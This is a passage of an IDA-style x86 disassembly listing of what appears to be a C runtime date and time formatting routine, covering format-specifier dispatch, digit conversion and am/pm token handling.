mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_437CCE: ; CODE XREF: sub_437B80+DF�j
jmp loc_437BE2
; ---------------------------------------------------------------------------
loc_437CD3: ; CODE XREF: sub_437B80+66�j
; sub_437B80:loc_437C02�j
cmp [ebp+var_8], 0
jz short loc_437CE5
push 13h
call sub_423320
add esp, 4
jmp short loc_437CF0
; ---------------------------------------------------------------------------
loc_437CE5: ; CODE XREF: sub_437B80+157�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_437CF0: ; CODE XREF: sub_437B80+163�j
cmp [ebp+var_C], 0
jbe short loc_437D04
mov eax, [ebp+arg_0]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
jmp short loc_437D06
; ---------------------------------------------------------------------------
loc_437D04: ; CODE XREF: sub_437B80+174�j
xor eax, eax
loc_437D06: ; CODE XREF: sub_437B80+182�j
mov esp, ebp
pop ebp
retn
sub_437B80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_437D10 proc near ; CODE XREF: sub_437B80+CE�p
; sub_4384E0+3EC�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
movsx eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
sub ecx, 25h
mov [ebp+var_C], ecx
cmp [ebp+var_C], 55h
ja loc_438278
mov eax, [ebp+var_C]
xor edx, edx
mov dl, byte_4382D9[eax]
jmp off_43827D[edx*4]
loc_437D43: ; DATA XREF: _0:004382AD�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4]
push eax
call sub_438330
add esp, 0Ch
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437D65: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:00438281�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+1Ch]
push eax
call sub_438330
add esp, 0Ch
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437D88: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382B1�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+38h]
push eax
call sub_438330
add esp, 0Ch
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437DAB: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:00438285�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+68h]
push eax
call sub_438330
add esp, 0Ch
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437DCE: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382B5�o
cmp ds:dword_4F36A0, 0
jz short loc_437E56
mov ds:dword_4F36A0, 0
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A4h]
push eax
call sub_4384E0
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_437E10
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437E10: ; CODE XREF: sub_437D10+F9�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax
call sub_4384E0
add esp, 14h
jmp short loc_437EC9
; ---------------------------------------------------------------------------
loc_437E56: ; CODE XREF: sub_437D10+C5�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A0h]
push eax
call sub_4384E0
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_437E85
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437E85: ; CODE XREF: sub_437D10+16E�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax
call sub_4384E0
add esp, 14h
loc_437EC9: ; CODE XREF: sub_437D10+144�j
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437ECE: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382B9�o
mov ecx, ds:dword_4F36A0
mov ds:dword_4F36A4, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+0Ch]
push edx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437EF8: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:00438289�o
mov eax, ds:dword_4F36A0
mov ds:dword_4F36A4, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
push ecx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437F20: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:0043828D�o
mov edx, ds:dword_4F36A0
mov ds:dword_4F36A4, edx
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cdq
mov ecx, 0Ch
idiv ecx
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jnz short loc_437F4A
mov [ebp+var_4], 0Ch
loc_437F4A: ; CODE XREF: sub_437D10+231�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437F65: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382BD�o
mov edx, ds:dword_4F36A0
mov ds:dword_4F36A4, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 3
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
add eax, 1
push eax
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437F92: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382C1�o
mov ecx, ds:dword_4F36A0
mov ds:dword_4F36A4, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+10h]
add edx, 1
push edx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437FBF: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:00438291�o
mov eax, ds:dword_4F36A0
mov ds:dword_4F36A4, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
push ecx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_437FE7: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382C5�o
mov edx, [ebp+arg_4]
cmp dword ptr [edx+8], 0Bh
jg short loc_43800C
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+98h]
push eax
call sub_438330
add esp, 0Ch
jmp short loc_438026
; ---------------------------------------------------------------------------
loc_43800C: ; CODE XREF: sub_437D10+2DE�j
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_10]
mov ecx, [eax+9Ch]
push ecx
call sub_438330
add esp, 0Ch
loc_438026: ; CODE XREF: sub_437D10+2FA�j
jmp loc_438278
; ---------------------------------------------------------------------------
loc_43802B: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:00438295�o
mov edx, ds:dword_4F36A0
mov ds:dword_4F36A4, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+arg_4]
mov eax, [edx]
push eax
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_438054: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:00438299�o
mov ecx, ds:dword_4F36A0
mov ds:dword_4F36A4, ecx
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
mov [ebp+var_8], eax
jmp short loc_4380BD
; ---------------------------------------------------------------------------
loc_43806B: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382C9�o
mov ecx, ds:dword_4F36A0
mov ds:dword_4F36A4, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 1
mov ecx, [ebp+arg_4]
mov edx, [ecx+18h]
push edx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_438095: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:0043829D�o
mov eax, ds:dword_4F36A0
mov ds:dword_4F36A4, eax
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+18h], 0
jnz short loc_4380B1
mov [ebp+var_8], 6
jmp short loc_4380BD
; ---------------------------------------------------------------------------
loc_4380B1: ; CODE XREF: sub_437D10+396�j
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
sub eax, 1
mov [ebp+var_8], eax
loc_4380BD: ; CODE XREF: sub_437D10+359�j
; sub_437D10+39F�j
mov ecx, [ebp+arg_4]
mov edx, [ecx+1Ch]
cmp edx, [ebp+var_8]
jge short loc_4380D1
mov [ebp+var_4], 0
jmp short loc_4380FE
; ---------------------------------------------------------------------------
loc_4380D1: ; CODE XREF: sub_437D10+3B6�j
mov eax, [ebp+arg_4]
mov eax, [eax+1Ch]
cdq
mov ecx, 7
idiv ecx
mov [ebp+var_4], eax
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
cdq
mov ecx, 7
idiv ecx
cmp edx, [ebp+var_8]
jl short loc_4380FE
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_4380FE: ; CODE XREF: sub_437D10+3BF�j
; sub_437D10+3E3�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+var_4]
push edx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_438119: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382CD�o
cmp ds:dword_4F36A0, 0
jz short loc_438150
mov ds:dword_4F36A0, 0
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A4h]
push edx
call sub_4384E0
add esp, 14h
jmp short loc_438172
; ---------------------------------------------------------------------------
loc_438150: ; CODE XREF: sub_437D10+410�j
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A0h]
push edx
call sub_4384E0
add esp, 14h
loc_438172: ; CODE XREF: sub_437D10+43E�j
jmp loc_438278
; ---------------------------------------------------------------------------
loc_438177: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382A1�o
mov ds:dword_4F36A0, 0
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A8h]
push edx
call sub_4384E0
add esp, 14h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_4381A8: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382D1�o
mov eax, ds:dword_4F36A0
mov ds:dword_4F36A4, eax
mov ecx, [ebp+arg_4]
mov eax, [ecx+14h]
cdq
mov ecx, 64h
idiv ecx
mov [ebp+var_4], edx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call sub_438380
add esp, 10h
jmp loc_438278
; ---------------------------------------------------------------------------
loc_4381DE: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382A5�o
mov edx, ds:dword_4F36A0
mov ds:dword_4F36A4, edx
mov eax, [ebp+arg_4]
mov eax, [eax+14h]
cdq
mov ecx, 64h
idiv ecx
mov ecx, eax
add ecx, 13h
imul ecx, 64h
mov edx, [ebp+arg_4]
mov eax, [edx+14h]
cdq
mov esi, 64h
idiv esi
add ecx, edx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 4
mov edx, [ebp+var_4]
push edx
call sub_438380
add esp, 10h
jmp short loc_438278
; ---------------------------------------------------------------------------
loc_43822B: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:004382A9�o
call sub_433030
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
cmp dword ptr [edx+20h], 0
setnz al
mov ecx, ds:off_454514[eax*4]
push ecx
call sub_438330
add esp, 0Ch
jmp short loc_438278
; ---------------------------------------------------------------------------
loc_438256: ; CODE XREF: sub_437D10+2C�j
; DATA XREF: _0:off_43827D�o
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 25h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_438278: ; CODE XREF: sub_437D10+1B�j
; sub_437D10+2C�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_437D10 endp
; ---------------------------------------------------------------------------
off_43827D dd offset loc_438256 ; DATA XREF: sub_437D10+2C�r
dd offset loc_437D65
dd offset loc_437DAB
dd offset loc_437EF8
dd offset loc_437F20
dd offset loc_437FBF
dd offset loc_43802B
dd offset loc_438054
dd offset loc_438095
dd offset loc_438177
dd offset loc_4381DE
dd offset loc_43822B
dd offset loc_437D43
dd offset loc_437D88
dd offset loc_437DCE
dd offset loc_437ECE
dd offset loc_437F65
dd offset loc_437F92
dd offset loc_437FE7
dd offset loc_43806B
dd offset loc_438119
dd offset loc_4381A8
dd offset loc_438278
byte_4382D9 db 0 ; DATA XREF: sub_437D10+26�r
dw 1616h
dd 6 dup(16161616h), 16020116h, 16161616h, 16160403h, 16160516h
dd 6161616h, 8160716h, 160B0A09h, 16161616h, 0E0D0C16h
dd 1616160Fh, 16101616h, 16161116h, 16161612h, 13161616h
dd 0CC0B1514h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438330 proc near ; CODE XREF: sub_437D10+48�p
; sub_437D10+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
loc_438333: ; CODE XREF: sub_438330+44�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jz short loc_438376
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_438376
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_4]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_4]
mov [eax], edx
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
jmp short loc_438333
; ---------------------------------------------------------------------------
loc_438376: ; CODE XREF: sub_438330+9�j
; sub_438330+13�j
pop ebp
retn
sub_438330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438380 proc near ; CODE XREF: sub_437D10+1DB�p
; sub_437D10+203�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
cmp ds:dword_4F36A4, 0
jz short loc_4383AA
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_438430
add esp, 0Ch
jmp short loc_438429
; ---------------------------------------------------------------------------
loc_4383AA: ; CODE XREF: sub_438380+12�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
cmp ecx, [eax]
jnb short loc_438420
mov edx, [ebp+arg_4]
sub edx, 1
mov [ebp+arg_4], edx
jmp short loc_4383C8
; ---------------------------------------------------------------------------
loc_4383BF: ; CODE XREF: sub_438380+82�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
loc_4383C8: ; CODE XREF: sub_438380+3D�j
mov ecx, [ebp+arg_4]
add ecx, 1
test ecx, ecx
jz short loc_438404
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
add edx, 30h
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov eax, [ebp+arg_4]
mov [ecx+eax], dl
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
mov [ebp+arg_0], eax
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_4383BF
; ---------------------------------------------------------------------------
loc_438404: ; CODE XREF: sub_438380+50�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
add ecx, [ebp+var_4]
mov edx, [ebp+arg_8]
mov [edx], ecx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, [ebp+var_4]
mov edx, [ebp+arg_C]
mov [edx], ecx
jmp short loc_438429
; ---------------------------------------------------------------------------
loc_438420: ; CODE XREF: sub_438380+32�j
mov eax, [ebp+arg_C]
mov dword ptr [eax], 0
loc_438429: ; CODE XREF: sub_438380+28�j
; sub_438380+9E�j
mov esp, ebp
pop ebp
retn
sub_438380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438430 proc near ; CODE XREF: sub_438380+20�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_8]
cmp dword ptr [edx], 1
jbe short loc_43848B
loc_438446: ; CODE XREF: sub_438430+59�j
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jle short loc_43848B
mov edx, [ebp+arg_8]
cmp dword ptr [edx], 1
ja short loc_438446
loc_43848B: ; CODE XREF: sub_438430+14�j
; sub_438430+51�j
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_4384A4: ; CODE XREF: sub_438430+A6�j
mov edx, [ebp+var_4]
mov al, [edx]
mov [ebp+var_C], al
mov ecx, [ebp+var_4]
mov edx, [ebp+var_8]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
mov al, [ebp+var_C]
mov [edx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
cmp edx, [ebp+var_4]
jb short loc_4384A4
mov esp, ebp
pop ebp
retn
sub_438430 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4384E0 proc near ; CODE XREF: sub_437D10+EB�p
; sub_437D10+13C�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
loc_4384E6: ; CODE XREF: sub_4384E0+2EA�j
; sub_4384E0:loc_4388AB�j ...
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_43895C
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0
jz loc_43895C
mov [ebp+var_8], 0
mov ds:dword_4F36A4, 0
mov [ebp+var_C], 0
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_438526
; ---------------------------------------------------------------------------
loc_43851D: ; CODE XREF: sub_4384E0+5F�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_438526: ; CODE XREF: sub_4384E0+3B�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
cmp eax, edx
jnz short loc_438541
jmp short loc_43851D
; ---------------------------------------------------------------------------
loc_438541: ; CODE XREF: sub_4384E0+5D�j
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
sub edx, 27h
mov [ebp+var_14], edx
cmp [ebp+var_14], 52h
ja loc_4388B0
mov ecx, [ebp+var_14]
xor eax, eax
mov al, byte_43898C[ecx]
jmp off_438960[eax*4]
loc_438578: ; DATA XREF: _0:0043896C�o
mov edx, [ebp+var_C]
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
sub eax, 1
mov [ebp+var_18], eax
cmp [ebp+var_18], 3
ja short loc_4385B1
mov ecx, [ebp+var_18]
jmp off_4389DF[ecx*4]
loc_438597: ; DATA XREF: _0:off_4389DF�o
mov ds:dword_4F36A4, 1
loc_4385A1: ; CODE XREF: sub_4384E0+B0�j
; DATA XREF: _0:004389E3�o
mov [ebp+var_8], 6Dh
jmp short loc_4385B1
; ---------------------------------------------------------------------------
loc_4385A7: ; CODE XREF: sub_4384E0+B0�j
; DATA XREF: _0:004389E7�o
mov [ebp+var_8], 62h
jmp short loc_4385B1
; ---------------------------------------------------------------------------
loc_4385AD: ; CODE XREF: sub_4384E0+B0�j
; DATA XREF: _0:004389EB�o
mov [ebp+var_8], 42h
loc_4385B1: ; CODE XREF: sub_4384E0+AB�j
; sub_4384E0+C5�j ...
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_4385B6: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:00438970�o
mov edx, [ebp+var_C]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 3
ja short loc_4385EF
mov ecx, [ebp+var_1C]
jmp off_4389EF[ecx*4]
loc_4385D5: ; CODE XREF: sub_4384E0+B0�j
; DATA XREF: _0:off_4389EF�o
mov ds:dword_4F36A4, 1
loc_4385DF: ; CODE XREF: sub_4384E0+B0�j
; sub_4384E0+EE�j
mov [ebp+var_8], 64h
jmp short loc_4385EF
; ---------------------------------------------------------------------------
loc_4385E5: ; CODE XREF: sub_4384E0+B0�j
; sub_4384E0+EE�j
mov [ebp+var_8], 61h
jmp short loc_4385EF
; ---------------------------------------------------------------------------
loc_4385EB: ; CODE XREF: sub_4384E0+B0�j
; sub_4384E0+EE�j
mov [ebp+var_8], 41h
loc_4385EF: ; CODE XREF: sub_4384E0+E9�j
; sub_4384E0+103�j ...
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_4385F4: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:00438984�o
mov edx, [ebp+var_C]
mov [ebp+var_20], edx
cmp [ebp+var_20], 2
jz short loc_438608
cmp [ebp+var_20], 4
jz short loc_43860E
jmp short loc_438612
; ---------------------------------------------------------------------------
loc_438608: ; CODE XREF: sub_4384E0+11E�j
mov [ebp+var_8], 79h
jmp short loc_438612
; ---------------------------------------------------------------------------
loc_43860E: ; CODE XREF: sub_4384E0+124�j
mov [ebp+var_8], 59h
loc_438612: ; CODE XREF: sub_4384E0+126�j
; sub_4384E0+12C�j
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_438617: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:00438974�o
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
cmp [ebp+var_24], 1
jz short loc_43862B
cmp [ebp+var_24], 2
jz short loc_438635
jmp short loc_438639
; ---------------------------------------------------------------------------
loc_43862B: ; CODE XREF: sub_4384E0+141�j
mov ds:dword_4F36A4, 1
loc_438635: ; CODE XREF: sub_4384E0+147�j
mov [ebp+var_8], 49h
loc_438639: ; CODE XREF: sub_4384E0+149�j
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_43863E: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:00438968�o
mov ecx, [ebp+var_C]
mov [ebp+var_28], ecx
cmp [ebp+var_28], 1
jz short loc_438652
cmp [ebp+var_28], 2
jz short loc_43865C
jmp short loc_438660
; ---------------------------------------------------------------------------
loc_438652: ; CODE XREF: sub_4384E0+168�j
mov ds:dword_4F36A4, 1
loc_43865C: ; CODE XREF: sub_4384E0+16E�j
mov [ebp+var_8], 48h
loc_438660: ; CODE XREF: sub_4384E0+170�j
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_438665: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:00438978�o
mov edx, [ebp+var_C]
mov [ebp+var_2C], edx
cmp [ebp+var_2C], 1
jz short loc_438679
cmp [ebp+var_2C], 2
jz short loc_438683
jmp short loc_438687
; ---------------------------------------------------------------------------
loc_438679: ; CODE XREF: sub_4384E0+18F�j
mov ds:dword_4F36A4, 1
loc_438683: ; CODE XREF: sub_4384E0+195�j
mov [ebp+var_8], 4Dh
loc_438687: ; CODE XREF: sub_4384E0+197�j
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_43868C: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:0043897C�o
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
cmp [ebp+var_30], 1
jz short loc_4386A0
cmp [ebp+var_30], 2
jz short loc_4386AA
jmp short loc_4386AE
; ---------------------------------------------------------------------------
loc_4386A0: ; CODE XREF: sub_4384E0+1B6�j
mov ds:dword_4F36A4, 1
loc_4386AA: ; CODE XREF: sub_4384E0+1BC�j
mov [ebp+var_8], 53h
loc_4386AE: ; CODE XREF: sub_4384E0+1BE�j
jmp loc_4388B0
; ---------------------------------------------------------------------------
loc_4386B3: ; CODE XREF: sub_4384E0+91�j
; DATA XREF: _0:00438964�o
push offset aAmPm ; "am/pm"
mov ecx, [ebp+arg_0]
push ecx
call sub_420F10
add esp, 8
test eax, eax
jnz short loc_4386D3
mov edx, [ebp+arg_0]
add edx, 5
mov [ebp+var_4], edx
jmp short loc_4386F1
; ---------------------------------------------------------------------------
loc_4386D3: ; CODE XREF: sub_4384E0+1E6�j
push offset aAP ; "a/p"
mov eax, [ebp+arg_0]
push eax
call sub_420F10
add esp, 8
test eax, eax
jnz short loc_4386F1
mov ecx, [ebp+arg_0]
add ecx, 3
mov [ebp+var_4], ecx
